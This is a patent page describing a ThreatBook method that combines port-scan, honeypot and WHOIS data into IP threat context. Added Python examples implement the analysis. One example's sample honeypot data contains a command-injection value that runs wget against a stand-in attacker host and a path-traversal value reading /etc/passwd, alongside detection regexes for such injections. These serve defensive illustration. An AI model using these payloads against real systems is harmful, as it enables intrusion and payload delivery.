CN115883258A - IP information processing method, device, electronic equipment and storage medium - Google Patents

Info

Publication number: CN115883258A
Authority: CN (China)
Prior art keywords: information data, attack, port, address, attacker
Legal status: Granted (the legal status is an assumption and is not a legal conclusion; Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed)
Application number: CN202310114335.5A
Other languages: Chinese (zh)
Other versions: CN115883258B (en)
Inventors: 卢胜, 樊兴华, 薛锋
Current assignee: Beijing ThreatBook Technology Co Ltd (the listed assignees may be inaccurate; Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list)
Original assignee: Beijing ThreatBook Technology Co Ltd
Application filed by: Beijing ThreatBook Technology Co Ltd
Priority to: CN202310114335.5A
Publication of: CN115883258A; application granted and published as CN115883258B
Current legal status: Active

Classifications

    • Y: GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
    • Y02: TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
    • Y02D: CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
    • Y02D30/00: Reducing energy consumption in communication networks
    • Y02D30/50: Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate

Landscapes

  • Data Exchanges In Wide-Area Networks (AREA)
  • Computer And Data Communications (AREA)

Abstract

The application provides an IP information processing method, an IP information processing device, electronic equipment and a storage medium. The IP information processing method comprises the steps of obtaining IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is collected by a network space detection system and the IP attack information data is collected by an internet honeypot system; and analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information. The method and the device can generate more comprehensive IP context information and improve the accuracy of the IP context information.

Description

IP information processing method, device, electronic equipment and storage medium
Technical Field
The present application relates to the field of computer technologies, and in particular, to an IP information processing method and apparatus, an electronic device, and a storage medium.
Background
In recent years, the field of network security has received increasing attention from the state and from society. A large number of attackers on the Internet use vulnerability scanning tools (a vulnerability scanning tool determines whether the services of a target IP have vulnerabilities) to scan the services of IP addresses across the whole Internet, thereby obtaining IP context information.
However, the IP context information obtained in the prior art is incomplete and of low accuracy.
Disclosure of Invention
An object of the embodiments of the present application is to provide an IP information processing method, an IP information processing apparatus, an electronic device, and a storage medium, so as to generate more comprehensive IP context information and improve accuracy of the IP context information.
In a first aspect, the present invention provides an IP information processing method, where the method includes:
acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system;
analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information.
In the first aspect of the present application, by obtaining IP port service information data, IP attack information data, and IP basic information data, wherein the IP port service information data is collected by a network space detection system, and the IP attack information data is collected by an internet honeypot system, it is possible to analyze the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
In an optional embodiment, the IP attack information data includes: the source IP of the attacker, the source port of the attacker, the HTTP request method of the attacker, the service type targeted by the attacker's attack, the port targeted by the attacker's attack, the user agent of the attacker's HTTP request, the URL address requested by the attacker, and the value of the POST packet sent by the attacker;
and, the IP port service information data includes: the open port of the target IP, the details of the response packet, the service name and the version information;
and the IP basic information data comprises the geographic position of the target IP, the domain name resolved by the target IP, a domain name registrant of the domain name resolved by the target IP and a mailbox of the domain name resolved by the target IP.
In the above optional implementation manner, more comprehensive and more accurate IP context information may be generated through data such as a source IP of an attacker, a source port of the attacker, an HTTP request method of the attacker, a target service type of the attack of the attacker, and a target port of the attack of the attacker.
In an optional implementation manner, after the acquiring IP port service information data, IP attack information data, and IP basic information data, before the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information, the method further includes:
and associating and storing the IP port service information data, the IP attack information data and the IP basic information data through a unique IP address.
In the above optional embodiment, the IP analysis efficiency may be improved by associating and storing the IP port service information data, the IP attack information data, and the IP basic information data with a unique IP address.
In an optional embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information includes:
matching URL addresses based on the values of the POST packets sent by the attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on a white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
scanning the file associated with each URL address with an antivirus engine, wherein if the scanning result indicates that the file associated with the URL address is a malicious file, the URL address is stored in a Trojan download address field of the current IP address, and a hash value of the malicious file and the scanning result are stored in a sample set;
comparing the value of the POST packet sent by the attacker with a preset vulnerability characteristic, if the value of the POST packet sent by the attacker hits the preset vulnerability characteristic, marking the vulnerability type of the current IP address, and determining that the penetration attack exists in the current IP address;
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with the vulnerability characteristics;
and when the HTTP request method of the attacker is GET and the comparison result indicates that no exploit character features are present in the IP attack information data, determining that a scanning attack exists for the current IP address.
In the above optional embodiment, URL addresses are matched based on the value of the POST packet sent by the attacker to obtain a first URL address set; normal websites in the first URL address set are filtered out based on a white list to obtain a second URL address set; the file associated with each URL address in the second URL address set is downloaded and scanned with an antivirus engine; and if the scan result indicates that the file associated with a URL address is a malicious file, that URL address is stored in the Trojan download address field of the current IP address, and the hash value of the malicious file and the scan result are stored in a sample set. On the other hand, the value of the POST packet sent by the attacker is compared with the preset vulnerability characteristics, and when the value hits the preset vulnerability characteristics, the vulnerability type of the current IP address is marked and a penetration attack is determined to exist for the current IP address. On the other hand, by determining whether the HTTP request method of the attacker is GET and comparing the IP attack information data with the vulnerability characteristics, a scanning attack can be determined to exist for the current IP address when the request method is GET and the comparison result indicates that no exploit character features are present in the IP attack information data.
In an optional embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information further includes:
determining whether the number of user agents in the attacker's HTTP requests is greater than 5, and if so, determining that the attacker is conducting an automated scanning attack with hiding capability;
and judging whether the user agent of the HTTP request of the attacker has botnet character characteristics or not, and if so, performing botnet family marking on the current IP address.
In the above optional embodiment, it can be determined that the attacker has the hiding capability for the automated scanning attack by determining whether the number of the user agents of the HTTP request of the attacker is greater than 5. On the other hand, whether the user agent of the HTTP request of the attacker has botnet character characteristics or not is judged, and then botnet family marking can be carried out on the current IP address.
In an optional embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information further includes:
determining whether the open port of the target IP is port 22, and if so, determining that the current IP address is the IP address of a Linux server;
and determining whether the open port of the target IP is port 3389, and if so, determining that the current IP address is the IP address of a Windows server.
In the above optional embodiment, the current IP address can be determined to be the IP address of a Linux server by determining whether the port opened by the target IP is port 22. On the other hand, whether the port opened by the target IP is port 3389 can be determined, and the current IP address can then be determined to be the IP address of a Windows server.
In an optional embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP have data, if so, storing the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP.
In the above optional embodiment, by determining whether the domain name resolved by the target IP, the domain name registrant of that domain name, and the mailbox of that domain name have data, the domain name resolved by the target IP, its domain name registrant, and its mailbox can be stored.
In a second aspect, the present invention provides an IP information processing apparatus, comprising:
an acquisition module, configured to acquire IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system and the IP attack information data is acquired by an Internet honeypot system;
and an analysis module, configured to analyze the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information.
The device of the second aspect of the present application can acquire IP port service information data, IP attack information data, and IP basic information data by executing the IP information processing method, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system, and further can analyze the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
In a third aspect, the present invention provides an electronic device comprising:
a processor; and
a memory configured to store machine readable instructions that, when executed by the processor, perform the IP information processing method of any of the preceding embodiments.
The electronic device of the third aspect of the present application can acquire IP port service information data, IP attack information data, and IP basic information data by executing an IP information processing method, where the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system, and further can analyze the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
In a fourth aspect, the present invention provides a storage medium storing a computer program for executing the IP information processing method according to any one of the preceding embodiments by a processor.
The storage medium of the fourth aspect of the present application can acquire IP port service information data, IP attack information data, and IP basic information data by executing an IP information processing method, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system, and further can analyze the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
Drawings
In order to illustrate the technical solutions of the embodiments of the present application more clearly, the drawings used in the embodiments are briefly described below. It should be understood that the following drawings illustrate only some embodiments of the present application and therefore should not be considered as limiting its scope, and that those skilled in the art can obtain other related drawings from these drawings without inventive effort.
Fig. 1 is a schematic flowchart of an IP information processing method disclosed in an embodiment of the present application;
fig. 2 is a schematic structural diagram of an IP information processing apparatus disclosed in an embodiment of the present application;
fig. 3 is a schematic structural diagram of an electronic device disclosed in an embodiment of the present application.
Detailed Description
The technical solutions in the embodiments of the present application will be described below with reference to the drawings in the embodiments of the present application.
Example one
Referring to fig. 1, fig. 1 is a schematic flow chart of an IP information processing method disclosed in an embodiment of the present application, and as shown in fig. 1, the method in the embodiment of the present application includes the following steps:
101. acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system;
102. analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information.
In the embodiment of the application, the IP port service information data, the IP attack information data and the IP basic information data are acquired, wherein the IP port service information data is acquired by a network space detection system and the IP attack information data is acquired by an Internet honeypot system; the IP port service information data, the IP attack information data and the IP basic information data can then be analyzed to generate the IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
In this embodiment, for step 101, the obtained IP port service information data, IP attack information data, and IP basic information data include data related to a plurality of IP addresses, for example, the IP port service information data, IP attack information data, and IP basic information data of an IP address a, and the IP port service information data, IP attack information data, and IP basic information data of an IP address B.
In the embodiment of the present application, for step 101, please refer to the prior art for a related description of a network space detection system, which is not described in detail in the embodiment of the present application. On the other hand, please refer to the prior art for an internet honeypot system, which is not described in detail in the embodiments of the present application.
In the embodiment of the present application, for step 102, the IP context information refers to the result obtained by analyzing the IP port service information data, the IP attack information data and the IP basic information data. For example, in the process of scanning the files associated with each URL address with the antivirus engine, if the scanning result indicates that the file associated with a URL address is a malicious file, the IP context information comprises a Trojan download address field, and that field points to the URL address from which the malicious file can be downloaded.
In this embodiment, as an optional implementation manner, the IP attack information data includes: the source IP of the attacker, the source port of the attacker, the HTTP request method of the attacker, the service type targeted by the attacker's attack, the port targeted by the attacker's attack, the user agent of the attacker's HTTP request, the URL address requested by the attacker, and the value of the POST packet sent by the attacker. On the other hand, the IP port service information data includes: the port opened by the target IP, response packet details, the service name and the version information. In another aspect, the IP basic information data includes the geographic location of the target IP, the domain name resolved by the target IP, the domain name registrant of that domain name, and the mailbox of that domain name.
In the above optional implementation manner, more comprehensive and more accurate IP context information can be generated through data such as the source IP of the attacker, the source port of the attacker, the HTTP request method of the attacker, the target service type of the attack of the attacker, and the target port of the attack of the attacker.
In the above alternative embodiment, the IP basic information data may be provided by a third-party platform.
In an alternative embodiment, after step 101 (acquiring the IP port service information data, the IP attack information data, and the IP basic information data) and before step 102 (analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate the IP context information), the method of the embodiment of the present application further includes the following step:
and associating and storing the IP port service information data, the IP attack information data and the IP basic information data through the unique IP address.
In the above optional embodiment, the IP analysis efficiency can be improved by associating and storing the IP port service information data, the IP attack information data, and the IP basic information data with the unique IP address.
In the above alternative embodiment, associating and storing the IP port service information data, the IP attack information data and the IP basic information data by a unique IP address means that data belonging to the same IP address are associated under that one IP address. For example, assume there are two data records, IP port service information data A and IP port service information data B; if the IP address of IP port service information data B is the IP address in IP port service information data A, then A and B are associated together, that is, the two data records are associated by the IP address.
In the first aspect of the present application, as an optional implementation manner, step 102 (analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information) comprises the following substeps:
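The association step above is a merge of three record streams keyed by IP address. The following Python example is added here as an illustration and is not code from the patent or from ThreatBook; the record field names, the sample records and the rejection of records whose IP field does not parse are all assumptions. Because honeypot fields are attacker-influenced input, the example canonicalises each address with the standard library and keeps unparseable records out of the key space instead of storing them verbatim.

```python
import ipaddress
from collections import defaultdict
from typing import Any, Dict, List, Tuple

# Constructed sample records standing in for the three sources the patent
# names (network space detection system, internet honeypot system and a
# third-party basic-information platform). Field names are assumptions.
PORT_SERVICE_RECORDS: List[Dict[str, Any]] = [
    {"ip": "203.0.113.10", "port": 22, "service": "ssh",
     "version": "OpenSSH_8.9", "response": "SSH-2.0-OpenSSH_8.9"},
    {"ip": "203.0.113.10", "port": 80, "service": "http",
     "version": "nginx/1.24", "response": "HTTP/1.1 200 OK"},
    {"ip": "2001:0db8:0000::1", "port": 3389, "service": "ms-wbt-server",
     "version": "", "response": ""},
]
ATTACK_RECORDS: List[Dict[str, Any]] = [
    {"src_ip": "203.0.113.10", "src_port": 51234, "method": "GET",
     "target_service": "http", "target_port": 80,
     "user_agent": "Mozilla/5.0", "url": "/", "post_body": ""},
    {"src_ip": "203.0.113.10", "src_port": 51235, "method": "POST",
     "target_service": "http", "target_port": 8080,
     "user_agent": "curl/8.0", "url": "/login", "post_body": "user=a&pass=b"},
    # constructed malformed record: must not become a key in the store
    {"src_ip": "not-an-ip", "src_port": 1, "method": "GET",
     "target_service": "http", "target_port": 80,
     "user_agent": "", "url": "/", "post_body": ""},
]
BASIC_INFO_RECORDS: List[Dict[str, Any]] = [
    {"ip": "203.0.113.10", "geo": "example-region", "domain": "example.com",
     "registrant": "Example Registrant", "mailbox": "admin@example.com"},
]


def normalize_ip(value: str) -> str:
    """Canonical text form of an IP, e.g. '2001:0db8:0000::1' -> '2001:db8::1'.
    Raises ValueError for anything that is not an IP address."""
    return str(ipaddress.ip_address(value.strip()))


def _empty_record() -> Dict[str, Any]:
    return {"port_services": [], "attacks": [], "basic": None}


def associate_by_ip(port_services, attacks, basic_infos) -> Tuple[Dict[str, Dict[str, Any]], List[Dict[str, Any]]]:
    """Group all three sources under one record per unique IP address.
    Records whose IP field does not parse are returned separately."""
    merged: Dict[str, Dict[str, Any]] = defaultdict(_empty_record)
    rejected: List[Dict[str, Any]] = []
    # for honeypot data the attacker's source IP is the address being profiled
    for source, key, bucket in ((port_services, "ip", "port_services"),
                                (attacks, "src_ip", "attacks")):
        for rec in source:
            try:
                ip = normalize_ip(rec.get(key, ""))
            except ValueError:
                rejected.append(rec)
                continue
            merged[ip][bucket].append(rec)
    for rec in basic_infos:
        try:
            merged[normalize_ip(rec.get("ip", ""))]["basic"] = rec
        except ValueError:
            rejected.append(rec)
    return dict(merged), rejected


def lookup(store: Dict[str, Dict[str, Any]], ip: str) -> Dict[str, Any]:
    """Fetch the associated record for one IP (an empty record if unseen)."""
    return store.get(normalize_ip(ip), _empty_record())


if __name__ == "__main__":
    store, bad = associate_by_ip(PORT_SERVICE_RECORDS, ATTACK_RECORDS, BASIC_INFO_RECORDS)
    for ip, rec in store.items():
        print(ip, len(rec["port_services"]), "services,", len(rec["attacks"]),
              "attacks,", "basic info" if rec["basic"] else "no basic info")
    print("rejected records:", len(bad))
```

Keying every source by the canonical form matters for IPv6, where the same address can be written several ways; with the raw strings the detection record and the honeypot record for `2001:0db8:0000::1` and `2001:db8::1` would land in two separate entries and the later analysis would see an incomplete picture.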
matching URL addresses based on the value of a POST packet sent by an attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on the white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
scanning the file associated with each URL address based on the antivirus engine, wherein if the scanning result represents that the file associated with the URL address is a malicious file, the URL address is stored in a Trojan horse downloading address field of the current IP address, and the Hash value of the malicious file and the scanning result are stored in a sample set;
comparing the value of the POST packet sent by the attacker with a preset vulnerability characteristic, if the value of the POST packet sent by the attacker hits the preset vulnerability characteristic, marking the vulnerability type of the current IP address, and determining that the penetration attack exists in the current IP address;
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with the vulnerability characteristics;
and when the HTTP request method of the attacker is GET and the comparison result indicates that no exploit character features are present in the IP attack information data, determining that a scanning attack exists for the current IP address.
In the above optional embodiment, URL addresses are matched based on the value of the POST packet sent by the attacker to obtain the first URL address set; normal websites in the first URL address set are filtered out based on the white list to obtain the second URL address set; the file associated with each URL address in the second URL address set is downloaded and scanned with the antivirus engine; and if the scan result indicates that the file associated with a URL address is a malicious file, that URL address is stored in the Trojan download address field of the current IP address, and the hash value of the malicious file and the scan result are stored in the sample set. On the other hand, the value of the POST packet sent by the attacker is compared with the preset vulnerability characteristics, and when the value hits the preset vulnerability characteristics, the vulnerability type of the current IP address is marked and a penetration attack is determined to exist for the current IP address. On the other hand, whether the HTTP request method of the attacker is GET is determined and the IP attack information data is compared with the vulnerability characteristics; when the request method is GET and the comparison result indicates that no exploit character features are present in the IP attack information data, a scanning attack can be determined to exist for the current IP address.
In this embodiment of the present application, as an optional implementation manner, step 102 (analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information) further comprises the following substeps:
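The substeps just listed (and the identical list in the summary of the first aspect) form one pipeline: extract URLs from POST values, drop whitelisted hosts, download and scan the rest, then classify each request as penetration or scanning. The Python below is an added example of that pipeline and is not the patent's or ThreatBook's code. The whitelist, the vulnerability signatures, the sample requests, the `.invalid` hostnames and the in-memory downloader and hash-denylist "scanner" are all constructed placeholders; the last two are injected so that a sandboxed fetcher and a real antivirus engine can be substituted without touching the analysis logic.

```python
import hashlib
import re
from typing import Callable, Dict, Iterable, List, Optional, Set, Tuple
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"<>;|&]+")

# Constructed whitelist of "normal websites" (assumption, not the patent's list).
WHITELIST: Set[str] = {"example.com", "cdn.example.net"}

# Constructed vulnerability signatures keyed by vulnerability type; placeholders
# standing in for the patent's "preset vulnerability characteristics".
VULN_SIGNATURES: Dict[str, "re.Pattern[str]"] = {
    "path_traversal": re.compile(r"\.\./\.\./"),
    "command_injection": re.compile(r"[;|`]\s*(?:wget|curl)\s"),
}

# Constructed stand-ins for the downloader and the antivirus engine.
FAKE_CONTENT: Dict[str, bytes] = {
    "http://dl.attacker.invalid/payload.bin": b"constructed malicious sample",
    "http://files.other.invalid/readme.txt": b"harmless text",
}
KNOWN_BAD_HASH = hashlib.sha256(b"constructed malicious sample").hexdigest()


def fake_fetch(url: str) -> bytes:
    return FAKE_CONTENT.get(url, b"")


def hash_denylist_scan(data: bytes) -> Optional[str]:
    """Stand-in AV verdict: a detection name if the hash is denylisted, else None."""
    return {KNOWN_BAD_HASH: "Trojan.Constructed"}.get(hashlib.sha256(data).hexdigest())


def extract_candidate_urls(post_bodies: Iterable[str]) -> Set[str]:
    """Match URL addresses in POST packet values -> first URL address set."""
    found: Set[str] = set()
    for body in post_bodies:
        found.update(URL_RE.findall(body))
    return found


def filter_whitelisted(urls: Set[str], whitelist: Set[str] = WHITELIST) -> Set[str]:
    """Drop URLs whose host is (or is under) a whitelisted site -> second URL set."""
    keep: Set[str] = set()
    for url in urls:
        host = (urlsplit(url).hostname or "").lower()
        if host and not any(host == w or host.endswith("." + w) for w in whitelist):
            keep.add(url)
    return keep


def analyse_attacks(attacks: List[Dict[str, str]],
                    fetch: Callable[[str], bytes] = fake_fetch,
                    scan: Callable[[bytes], Optional[str]] = hash_denylist_scan
                    ) -> Tuple[Dict[str, object], Dict[str, str]]:
    """Attack-derived context for one IP plus the sample set (sha256 -> verdict)."""
    context: Dict[str, object] = {"trojan_download_urls": [], "vuln_types": set(),
                                  "penetration_attack": False, "scanning_attack": False}
    samples: Dict[str, str] = {}
    post_bodies = [a["post_body"] for a in attacks if a["method"] == "POST"]
    for url in sorted(filter_whitelisted(extract_candidate_urls(post_bodies))):
        data = fetch(url)
        verdict = scan(data)
        if verdict:  # malicious: record download URL on the IP, hash+verdict in samples
            context["trojan_download_urls"].append(url)
            samples[hashlib.sha256(data).hexdigest()] = verdict
    for a in attacks:
        if a["method"] == "POST":
            hits = {t for t, rx in VULN_SIGNATURES.items() if rx.search(a["post_body"])}
            if hits:
                context["vuln_types"] |= hits
                context["penetration_attack"] = True
        elif a["method"] == "GET":
            request_text = a["url"] + " " + a.get("user_agent", "")
            if not any(rx.search(request_text) for rx in VULN_SIGNATURES.values()):
                context["scanning_attack"] = True  # GET without exploit features
    return context, samples


# Constructed honeypot records for one attacking IP.
SAMPLE_ATTACKS: List[Dict[str, str]] = [
    {"method": "GET", "url": "/", "user_agent": "Mozilla/5.0", "post_body": ""},
    {"method": "POST", "url": "/cgi-bin/run", "user_agent": "curl/8.0",
     "post_body": "cmd=;wget http://dl.attacker.invalid/payload.bin"},
    {"method": "POST", "url": "/download", "user_agent": "curl/8.0",
     "post_body": "file=../../etc/passwd&ref=http://cdn.example.net/lib.js"},
    {"method": "POST", "url": "/notes", "user_agent": "curl/8.0",
     "post_body": "link=http://files.other.invalid/readme.txt"},
]

if __name__ == "__main__":
    ctx, samples = analyse_attacks(SAMPLE_ATTACKS)
    print(ctx)
    print(samples)
```

Two points a practitioner would check in a real deployment: the whitelist match is on the parsed hostname rather than a substring of the URL, so a hostile URL that merely contains a whitelisted name in its path or query is not skipped; and the hash stored in the sample set is computed over the bytes that were actually scanned, so the stored verdict and the stored hash always refer to the same object.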
determining whether the number of user agents in the attacker's HTTP requests is greater than 5, and if so, determining that the attacker is conducting an automated scanning attack with hiding capability;
and determining whether the user agents of the attacker's HTTP requests have botnet character features, and if so, marking the current IP address with a botnet family.
In the above optional embodiment, it can be determined that the attacker has the hiding capability for the automated scanning attack by determining whether the user agents of the HTTP requests of the attacker are greater than 5. On the other hand, whether the user agent of the HTTP request of the attacker has botnet character characteristics or not is judged, and then botnet family marking can be carried out on the current IP address.
In the above alternative embodiment, as an example, the current IP address may be labeled as belonging to the Mirai family or to the Kinsing botnet family.
In the embodiment of the present application, as an optional implementation manner, step 102 (analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information) further comprises the following steps:
determining whether the open port of the target IP is port 22, and if so, determining that the current IP address is the IP address of a Linux server;
and determining whether the open port of the target IP is port 3389, and if so, determining that the current IP address is the IP address of a Windows server.
In the above optional embodiment, the current IP address can be determined to be the IP address of a Linux server by determining whether the port opened by the target IP is port 22. On the other hand, whether the port opened by the target IP is port 3389 can be determined, and the current IP address can then be determined to be the IP address of a Windows server. It should be noted that, in the above alternative embodiment, port 22 is the port used by the SSH service.
In the embodiment of the present application, as an optional implementation manner, step 102 (analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information) further comprises the following step:
determining whether the domain name resolved by the target IP, the domain name registrant of that domain name and the mailbox of that domain name have data, and if so, storing the domain name resolved by the target IP, its domain name registrant and its mailbox.
In the above optional embodiment, by determining whether the domain name resolved by the target IP, the domain name registrant of that domain name, and the mailbox of that domain name have data, the domain name resolved by the target IP, its domain name registrant, and its mailbox can be stored.
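The remaining context fields described above come from three small rules: the user-agent count and botnet-family check on the honeypot requests, the port-22/port-3389 operating-system heuristic on the detection system's open ports, and the store-only-if-present rule for the resolved domain, registrant and mailbox. The Python below is an added example that applies all three to one associated IP record; it is not the patent's or ThreatBook's code. The botnet family names and their user-agent patterns are constructed placeholders (they are not indicators for Mirai, Kinsing or any real family), and the record layout and sample data are assumptions.

```python
import re
from collections import Counter
from typing import Any, Dict, List, Optional

UA_HIDING_THRESHOLD = 5  # patent: more than 5 user agents -> evasive automated scanning
OS_BY_PORT = {22: "linux server", 3389: "windows server"}  # patent's port heuristic

# Constructed botnet user-agent signatures: placeholder family names and
# patterns, not the patent's list and not real botnet indicators.
BOTNET_UA_SIGNATURES: Dict[str, "re.Pattern[str]"] = {
    "constructed-family-A": re.compile(r"\bFamA-Scanner/\d+"),
    "constructed-family-B": re.compile(r"\bfamb-bot\b"),
}


def user_agent_context(attacks: List[Dict[str, Any]]) -> Dict[str, Any]:
    """Distinct user-agent count, the >5 hiding-capability flag and family labels."""
    uas = Counter(a["user_agent"] for a in attacks if a.get("user_agent"))
    families = sorted(fam for fam, rx in BOTNET_UA_SIGNATURES.items()
                      if any(rx.search(ua) for ua in uas))
    return {"distinct_user_agents": len(uas),
            "evasive_automated_scan": len(uas) > UA_HIDING_THRESHOLD,
            "botnet_families": families}


def os_context(port_services: List[Dict[str, Any]]) -> Dict[str, Any]:
    """Apply the port-22 / port-3389 rule to the open ports seen by the detection system."""
    open_ports = sorted({p["port"] for p in port_services})
    return {"open_ports": open_ports,
            "os_labels": [OS_BY_PORT[p] for p in open_ports if p in OS_BY_PORT]}


def whois_context(basic: Optional[Dict[str, Any]]) -> Dict[str, str]:
    """Keep domain, registrant and mailbox only when all three carry data."""
    fields = ("domain", "registrant", "mailbox")
    if basic and all(basic.get(f) for f in fields):
        return {f: basic[f] for f in fields}
    return {}


def build_context(record: Dict[str, Any]) -> Dict[str, Any]:
    """Combine the three rule outputs into one IP context dictionary."""
    ctx: Dict[str, Any] = {}
    ctx.update(user_agent_context(record["attacks"]))
    ctx.update(os_context(record["port_services"]))
    ctx.update(whois_context(record.get("basic")))
    return ctx


# Constructed associated record for one IP (shape is an assumption).
SAMPLE_RECORD: Dict[str, Any] = {
    "port_services": [{"port": 22, "service": "ssh"}, {"port": 80, "service": "http"}],
    "attacks": [{"method": "GET", "user_agent": ua} for ua in (
        "Mozilla/5.0 (A)", "Mozilla/5.0 (B)", "curl/8.0", "python-requests/2.31",
        "FamA-Scanner/3", "Mozilla/4.0 (C)")],
    "basic": {"geo": "example-region", "domain": "example.com",
              "registrant": "Example Registrant", "mailbox": "admin@example.com"},
}

if __name__ == "__main__":
    print(build_context(SAMPLE_RECORD))
```

The port rule is applied exactly as the patent states it. In practice an open port 22 or 3389 is a weak operating-system signal on its own (SSH daemons run on Windows, and RDP can be fronted by gateways), so a deployment would normally corroborate the label with the service name and version string that the detection system also collects.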
In the embodiment of the present application, as an optional implementation manner, the method of the embodiment of the present application further includes the following steps:
and displaying the IP context information.
Example two
Referring to fig. 2, fig. 2 is a schematic structural diagram of an IP information processing apparatus disclosed in an embodiment of the present application, and as shown in fig. 2, the apparatus in the embodiment of the present application includes the following functional modules:
an obtaining module 201, configured to obtain IP port service information data, IP attack information data, and IP basic information data, where the IP port service information data is collected by a network space detection system, and the IP attack information data is collected by an internet honeypot system;
the analysis module 202 is configured to analyze the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information.
By executing the IP information processing method, the apparatus can acquire the IP port service information data, the IP attack information data and the IP basic information data, wherein the IP port service information data is collected by a network space detection system and the IP attack information data is collected by an Internet honeypot system, and can analyze the IP port service information data, the IP attack information data and the IP basic information data to generate the IP context information. Compared with the prior art, the IP context information is generated on the basis of the IP port service information data, the IP attack information data and the IP basic information data together, so the method is more comprehensive and more accurate.
Example three
Referring to fig. 3, fig. 3 is a schematic structural diagram of an electronic device disclosed in an embodiment of the present application, and as shown in fig. 3, the electronic device in the embodiment of the present application includes:
a processor 301; and
a memory 302 configured to store machine readable instructions that, when executed by the processor 301, perform the IP information processing method according to any one of the preceding embodiments.
By executing the IP information processing method, the electronic device of the embodiment of the application can acquire the IP port service information data, the IP attack information data and the IP basic information data, wherein the IP port service information data is collected by a network space detection system and the IP attack information data is collected by an Internet honeypot system, and can analyze the IP port service information data, the IP attack information data and the IP basic information data to generate the IP context information. Compared with the prior art, the IP context information is generated on the basis of the IP port service information data, the IP attack information data and the IP basic information data together, so the method is more comprehensive and more accurate.
Example four
An embodiment of the present application provides a storage medium, which stores a computer program, and the computer program is executed by a processor to execute the IP information processing method according to any one of the foregoing embodiments.
By executing the IP information processing method, the storage medium of the embodiment of the application can acquire the IP port service information data, the IP attack information data and the IP basic information data, wherein the IP port service information data is collected by a network space detection system and the IP attack information data is collected by an Internet honeypot system, and can analyze the IP port service information data, the IP attack information data and the IP basic information data to generate the IP context information. Compared with the prior art, the IP context information is generated on the basis of the IP port service information data, the IP attack information data and the IP basic information data together, so the method is more comprehensive and more accurate.
In the embodiments provided in the present application, it should be understood that the disclosed apparatus and method may be implemented in other ways. The above-described apparatus embodiments are merely illustrative, and for example, a division of a unit is only a logical division, and other divisions may be realized in practice, and for example, a plurality of units or components may be combined or integrated into another system, or some features may be omitted, or not executed. In addition, the shown or discussed coupling or direct coupling or communication connection between each other may be through some communication interfaces, indirect coupling or communication connection between devices or units, and may be in an electrical, mechanical or other form.
In addition, units described as separate parts may or may not be physically separate, and parts displayed as units may or may not be physical units, may be located in one place, or may be distributed on a plurality of network units. Some or all of the units can be selected according to actual needs to achieve the purpose of the solution of the embodiment.
Furthermore, the functional modules in the embodiments of the present application may be integrated together to form an independent part, or each module may exist separately, or two or more modules may be integrated to form an independent part.
